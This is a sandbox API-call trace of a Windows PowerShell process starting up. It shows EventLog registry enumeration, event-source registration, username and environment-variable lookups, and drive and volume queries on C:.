	[0779.579] RegQueryInfoKeyW (in: hKey=0x368, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x24d57c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x24d578, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x24d57c*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x24d578*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0779.579] CoTaskMemFree (pv=0x0) 
	[0779.579] CoTaskMemAlloc (cb=0x204) returned 0x4c7640
	[0779.579] RegEnumKeyExW (in: hKey=0x368, dwIndex=0x0, lpName=0x4c7640, lpcchName=0x24d608, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x24d608, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0779.579] CoTaskMemFree (pv=0x4c7640) 
	[0779.579] CoTaskMemFree (pv=0x0) 
	[0779.579] CoTaskMemAlloc (cb=0x204) returned 0x4c7640
	[0779.580] RegEnumKeyExW (in: hKey=0x368, dwIndex=0x1, lpName=0x4c7640, lpcchName=0x24d608, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x24d608, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0779.580] CoTaskMemFree (pv=0x4c7640) 
	[0779.580] CoTaskMemFree (pv=0x0) 
	[0779.580] CoTaskMemAlloc (cb=0x204) returned 0x4c7640
	[0779.580] RegEnumKeyExW (in: hKey=0x368, dwIndex=0x2, lpName=0x4c7640, lpcchName=0x24d608, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x24d608, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0779.580] CoTaskMemFree (pv=0x4c7640) 
	[0779.580] CoTaskMemFree (pv=0x0) 
	[0779.580] CoTaskMemAlloc (cb=0x204) returned 0x4c7640
	[0779.580] RegEnumKeyExW (in: hKey=0x368, dwIndex=0x3, lpName=0x4c7640, lpcchName=0x24d608, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x24d608, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0779.580] CoTaskMemFree (pv=0x4c7640) 
	[0779.580] CoTaskMemFree (pv=0x0) 
	[0779.580] CoTaskMemAlloc (cb=0x204) returned 0x4c7640
	[0779.580] RegEnumKeyExW (in: hKey=0x368, dwIndex=0x4, lpName=0x4c7640, lpcchName=0x24d608, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0x24d608, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0779.580] CoTaskMemFree (pv=0x4c7640) 
	[0779.580] CoTaskMemFree (pv=0x0) 
	[0779.581] CoTaskMemAlloc (cb=0x204) returned 0x4c7640
	[0779.581] RegEnumKeyExW (in: hKey=0x368, dwIndex=0x5, lpName=0x4c7640, lpcchName=0x24d608, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x24d608, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0779.581] CoTaskMemFree (pv=0x4c7640) 
	[0779.581] CoTaskMemFree (pv=0x0) 
	[0779.581] CoTaskMemAlloc (cb=0x204) returned 0x4c7640
	[0779.581] RegEnumKeyExW (in: hKey=0x368, dwIndex=0x6, lpName=0x4c7640, lpcchName=0x24d608, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x24d608, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0779.581] CoTaskMemFree (pv=0x4c7640) 
	[0779.581] CoTaskMemFree (pv=0x0) 
	[0779.581] CoTaskMemAlloc (cb=0x204) returned 0x4c7640
	[0779.581] RegEnumKeyExW (in: hKey=0x368, dwIndex=0x7, lpName=0x4c7640, lpcchName=0x24d608, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x24d608, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0779.581] CoTaskMemFree (pv=0x4c7640) 
	[0779.581] CoTaskMemFree (pv=0x0) 
	[0779.581] CoTaskMemAlloc (cb=0x204) returned 0x4c7640
	[0779.581] RegEnumKeyExW (in: hKey=0x368, dwIndex=0x8, lpName=0x4c7640, lpcchName=0x24d608, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x24d608, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0779.581] CoTaskMemFree (pv=0x4c7640) 
	[0779.582] CoTaskMemFree (pv=0x0) 
	[0779.582] RegOpenKeyExW (in: hKey=0x368, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d668 | out: phkResult=0x24d668*=0x344) returned 0x0
	[0779.582] RegOpenKeyExW (in: hKey=0x344, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d668 | out: phkResult=0x24d668*=0x0) returned 0x2
	[0779.582] RegOpenKeyExW (in: hKey=0x368, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d668 | out: phkResult=0x24d668*=0x36c) returned 0x0
	[0779.582] RegOpenKeyExW (in: hKey=0x36c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d668 | out: phkResult=0x24d668*=0x0) returned 0x2
	[0779.582] RegOpenKeyExW (in: hKey=0x368, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d668 | out: phkResult=0x24d668*=0x370) returned 0x0
	[0779.582] RegOpenKeyExW (in: hKey=0x370, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d668 | out: phkResult=0x24d668*=0x0) returned 0x2
	[0779.582] RegOpenKeyExW (in: hKey=0x368, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d668 | out: phkResult=0x24d668*=0x374) returned 0x0
	[0779.582] RegOpenKeyExW (in: hKey=0x374, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d668 | out: phkResult=0x24d668*=0x0) returned 0x2
	[0779.583] RegOpenKeyExW (in: hKey=0x368, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d668 | out: phkResult=0x24d668*=0x378) returned 0x0
	[0779.583] RegOpenKeyExW (in: hKey=0x378, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d668 | out: phkResult=0x24d668*=0x0) returned 0x2
	[0779.583] RegOpenKeyExW (in: hKey=0x368, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d668 | out: phkResult=0x24d668*=0x37c) returned 0x0
	[0779.583] RegOpenKeyExW (in: hKey=0x37c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d668 | out: phkResult=0x24d668*=0x0) returned 0x2
	[0779.583] RegOpenKeyExW (in: hKey=0x368, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d668 | out: phkResult=0x24d668*=0x380) returned 0x0
	[0779.583] RegOpenKeyExW (in: hKey=0x380, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d668 | out: phkResult=0x24d668*=0x0) returned 0x2
	[0779.583] RegOpenKeyExW (in: hKey=0x368, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d668 | out: phkResult=0x24d668*=0x384) returned 0x0
	[0779.583] RegOpenKeyExW (in: hKey=0x384, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d668 | out: phkResult=0x24d668*=0x0) returned 0x2
	[0779.583] RegOpenKeyExW (in: hKey=0x368, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d668 | out: phkResult=0x24d668*=0x388) returned 0x0
	[0779.584] RegOpenKeyExW (in: hKey=0x388, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d668 | out: phkResult=0x24d668*=0x38c) returned 0x0
	[0779.584] RegCloseKey (hKey=0x38c) returned 0x0
	[0779.584] RegCloseKey (hKey=0x368) returned 0x0
	[0779.586] RegCloseKey (hKey=0x388) returned 0x0
	[0779.586] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d5d8 | out: phkResult=0x24d5d8*=0x388) returned 0x0
	[0779.587] RegQueryInfoKeyW (in: hKey=0x388, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x24d54c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x24d548, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x24d54c*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x24d548*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0779.587] CoTaskMemFree (pv=0x0) 
	[0779.587] CoTaskMemAlloc (cb=0x204) returned 0x4c7640
	[0779.587] RegEnumKeyExW (in: hKey=0x388, dwIndex=0x0, lpName=0x4c7640, lpcchName=0x24d5d8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x24d5d8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0779.587] CoTaskMemFree (pv=0x4c7640) 
	[0779.587] CoTaskMemFree (pv=0x0) 
	[0779.587] CoTaskMemAlloc (cb=0x204) returned 0x4c7640
	[0779.587] RegEnumKeyExW (in: hKey=0x388, dwIndex=0x1, lpName=0x4c7640, lpcchName=0x24d5d8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x24d5d8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0779.587] CoTaskMemFree (pv=0x4c7640) 
	[0779.587] CoTaskMemFree (pv=0x0) 
	[0779.587] CoTaskMemAlloc (cb=0x204) returned 0x4c7640
	[0779.587] RegEnumKeyExW (in: hKey=0x388, dwIndex=0x2, lpName=0x4c7640, lpcchName=0x24d5d8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x24d5d8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0779.587] CoTaskMemFree (pv=0x4c7640) 
	[0779.587] CoTaskMemFree (pv=0x0) 
	[0779.587] CoTaskMemAlloc (cb=0x204) returned 0x4c7640
	[0779.588] RegEnumKeyExW (in: hKey=0x388, dwIndex=0x3, lpName=0x4c7640, lpcchName=0x24d5d8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x24d5d8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0779.588] CoTaskMemFree (pv=0x4c7640) 
	[0779.588] CoTaskMemFree (pv=0x0) 
	[0779.588] CoTaskMemAlloc (cb=0x204) returned 0x4c7640
	[0779.588] RegEnumKeyExW (in: hKey=0x388, dwIndex=0x4, lpName=0x4c7640, lpcchName=0x24d5d8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0x24d5d8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0779.588] CoTaskMemFree (pv=0x4c7640) 
	[0779.588] CoTaskMemFree (pv=0x0) 
	[0779.588] CoTaskMemAlloc (cb=0x204) returned 0x4c7640
	[0779.588] RegEnumKeyExW (in: hKey=0x388, dwIndex=0x5, lpName=0x4c7640, lpcchName=0x24d5d8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x24d5d8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0779.588] CoTaskMemFree (pv=0x4c7640) 
	[0779.588] CoTaskMemFree (pv=0x0) 
	[0779.588] CoTaskMemAlloc (cb=0x204) returned 0x4c7640
	[0779.588] RegEnumKeyExW (in: hKey=0x388, dwIndex=0x6, lpName=0x4c7640, lpcchName=0x24d5d8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x24d5d8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0779.588] CoTaskMemFree (pv=0x4c7640) 
	[0779.589] CoTaskMemFree (pv=0x0) 
	[0779.589] CoTaskMemAlloc (cb=0x204) returned 0x4c7640
	[0779.589] RegEnumKeyExW (in: hKey=0x388, dwIndex=0x7, lpName=0x4c7640, lpcchName=0x24d5d8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x24d5d8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0779.589] CoTaskMemFree (pv=0x4c7640) 
	[0779.589] CoTaskMemFree (pv=0x0) 
	[0779.589] CoTaskMemAlloc (cb=0x204) returned 0x4c7640
	[0779.589] RegEnumKeyExW (in: hKey=0x388, dwIndex=0x8, lpName=0x4c7640, lpcchName=0x24d5d8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x24d5d8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0779.589] CoTaskMemFree (pv=0x4c7640) 
	[0779.589] CoTaskMemFree (pv=0x0) 
	[0779.589] RegOpenKeyExW (in: hKey=0x388, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d638 | out: phkResult=0x24d638*=0x368) returned 0x0
	[0779.589] RegOpenKeyExW (in: hKey=0x368, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d638 | out: phkResult=0x24d638*=0x0) returned 0x2
	[0779.589] RegOpenKeyExW (in: hKey=0x388, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d638 | out: phkResult=0x24d638*=0x38c) returned 0x0
	[0779.589] RegOpenKeyExW (in: hKey=0x38c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d638 | out: phkResult=0x24d638*=0x0) returned 0x2
	[0779.590] RegOpenKeyExW (in: hKey=0x388, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d638 | out: phkResult=0x24d638*=0x390) returned 0x0
	[0779.590] RegOpenKeyExW (in: hKey=0x390, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d638 | out: phkResult=0x24d638*=0x0) returned 0x2
	[0779.590] RegOpenKeyExW (in: hKey=0x388, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d638 | out: phkResult=0x24d638*=0x394) returned 0x0
	[0779.590] RegOpenKeyExW (in: hKey=0x394, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d638 | out: phkResult=0x24d638*=0x0) returned 0x2
	[0779.590] RegOpenKeyExW (in: hKey=0x388, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d638 | out: phkResult=0x24d638*=0x398) returned 0x0
	[0779.590] RegOpenKeyExW (in: hKey=0x398, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d638 | out: phkResult=0x24d638*=0x0) returned 0x2
	[0779.590] RegOpenKeyExW (in: hKey=0x388, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d638 | out: phkResult=0x24d638*=0x39c) returned 0x0
	[0779.591] RegOpenKeyExW (in: hKey=0x39c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d638 | out: phkResult=0x24d638*=0x0) returned 0x2
	[0779.591] RegOpenKeyExW (in: hKey=0x388, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d638 | out: phkResult=0x24d638*=0x3a0) returned 0x0
	[0779.591] RegOpenKeyExW (in: hKey=0x3a0, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d638 | out: phkResult=0x24d638*=0x0) returned 0x2
	[0779.591] RegOpenKeyExW (in: hKey=0x388, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d638 | out: phkResult=0x24d638*=0x3a4) returned 0x0
	[0779.591] RegOpenKeyExW (in: hKey=0x3a4, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d638 | out: phkResult=0x24d638*=0x0) returned 0x2
	[0779.591] RegOpenKeyExW (in: hKey=0x388, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d638 | out: phkResult=0x24d638*=0x3a8) returned 0x0
	[0779.591] RegOpenKeyExW (in: hKey=0x3a8, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d638 | out: phkResult=0x24d638*=0x3ac) returned 0x0
	[0779.591] RegCloseKey (hKey=0x3ac) returned 0x0
	[0779.591] RegCloseKey (hKey=0x388) returned 0x0
	[0779.592] RegCloseKey (hKey=0x3a8) returned 0x0
	[0779.597] RegisterEventSourceW (lpUNCServerName=".", lpSourceName="PowerShell") returned 0x1b9e0008
	[0780.066] ReportEventW (hEventLog=0x1b9e0008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x31ee268*="WSMan", lpRawData=0x31edfd8) returned 1
	[0780.073] CoTaskMemAlloc (cb=0x104) returned 0x51cbd0
	[0780.073] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x51cbd0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0780.073] CoTaskMemFree (pv=0x51cbd0) 
	[0780.075] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24d170, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0780.075] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24d0c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0780.075] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24d0c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0780.076] CoTaskMemAlloc (cb=0x804) returned 0x1b8fc8f0
	[0780.076] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b8fc8f0, nSize=0x24d8c8 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x24d8c8) returned 0x1
	[0780.076] CoTaskMemFree (pv=0x1b8fc8f0) 
	[0780.076] CoTaskMemAlloc (cb=0x204) returned 0x4c7640
	[0780.076] GetUserNameW (in: lpBuffer=0x4c7640, pcbBuffer=0x24d908 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x24d908) returned 1
	[0780.076] CoTaskMemFree (pv=0x4c7640) 
	[0780.077] ReportEventW (hEventLog=0x1b9e0008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x31f37a0*="Alias", lpRawData=0x31f3530) returned 1
	[0780.085] CoTaskMemAlloc (cb=0x104) returned 0x51cbd0
	[0780.085] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x51cbd0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0780.085] CoTaskMemFree (pv=0x51cbd0) 
	[0780.087] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24d170, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0780.087] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24d0c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0780.087] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24d0c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0780.088] CoTaskMemAlloc (cb=0x804) returned 0x1b8fc8f0
	[0780.088] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b8fc8f0, nSize=0x24d8c8 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x24d8c8) returned 0x1
	[0780.088] CoTaskMemFree (pv=0x1b8fc8f0) 
	[0780.088] CoTaskMemAlloc (cb=0x204) returned 0x4c7640
	[0780.088] GetUserNameW (in: lpBuffer=0x4c7640, pcbBuffer=0x24d908 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x24d908) returned 1
	[0780.089] CoTaskMemFree (pv=0x4c7640) 
	[0780.089] ReportEventW (hEventLog=0x1b9e0008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x31f8d98*="Environment", lpRawData=0x31f8b28) returned 1
	[0780.111] CoTaskMemAlloc (cb=0x104) returned 0x51cbd0
	[0780.111] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x51cbd0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0780.111] CoTaskMemFree (pv=0x51cbd0) 
	[0780.113] CoTaskMemAlloc (cb=0x104) returned 0x51cbd0
	[0780.113] GetEnvironmentVariableW (in: lpName="HOMEDRIVE", lpBuffer=0x51cbd0, nSize=0x80 | out: lpBuffer="C:") returned 0x2
	[0780.113] CoTaskMemFree (pv=0x51cbd0) 
	[0780.113] CoTaskMemAlloc (cb=0x104) returned 0x51cbd0
	[0780.113] GetEnvironmentVariableW (in: lpName="HOMEPATH", lpBuffer=0x51cbd0, nSize=0x80 | out: lpBuffer="\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1b
	[0780.113] CoTaskMemFree (pv=0x51cbd0) 
	[0780.114] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", nBufferLength=0x105, lpBuffer=0x24d470, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFilePart=0x0) returned 0x1d
	[0780.114] SetErrorMode (uMode=0x1) returned 0x1
	[0780.114] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz"), fInfoLevelId=0x0, lpFileInformation=0x24d680 | out: lpFileInformation=0x24d680*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0780.114] SetErrorMode (uMode=0x1) returned 0x1
	[0780.115] GetLogicalDrives () returned 0x4
	[0780.116] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x24d1e0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0780.117] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0780.117] SetErrorMode (uMode=0x1) returned 0x1
	[0780.118] CoTaskMemAlloc (cb=0x68) returned 0x1b8e1f10
	[0780.118] CoTaskMemAlloc (cb=0x68) returned 0x1b8e2680
	[0780.118] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x1b8e1f10, nVolumeNameSize=0x32, lpVolumeSerialNumber=0x24d650, lpMaximumComponentLength=0x24d64c, lpFileSystemFlags=0x24d648, lpFileSystemNameBuffer=0x1b8e2680, nFileSystemNameSize=0x32 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x24d650*=0x9c354b42, lpMaximumComponentLength=0x24d64c*=0xff, lpFileSystemFlags=0x24d648*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1
	[0780.119] CoTaskMemFree (pv=0x1b8e1f10) 
	[0780.119] CoTaskMemFree (pv=0x1b8e2680) 
	[0780.119] SetErrorMode (uMode=0x1) returned 0x1
	[0780.119] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0780.120] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x24d390, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0780.120] SetErrorMode (uMode=0x1) returned 0x1
	[0780.120] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x24d5f0 | out: lpFileInformation=0x24d5f0*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0780.121] SetErrorMode (uMode=0x1) returned 0x1
	[0780.121] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x24d390, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0780.121] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x24d240, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0780.121] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0780.121] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x24d170, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0780.122] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0780.122] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x24d1c0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0780.123] SetErrorMode (uMode=0x1) returned 0x1
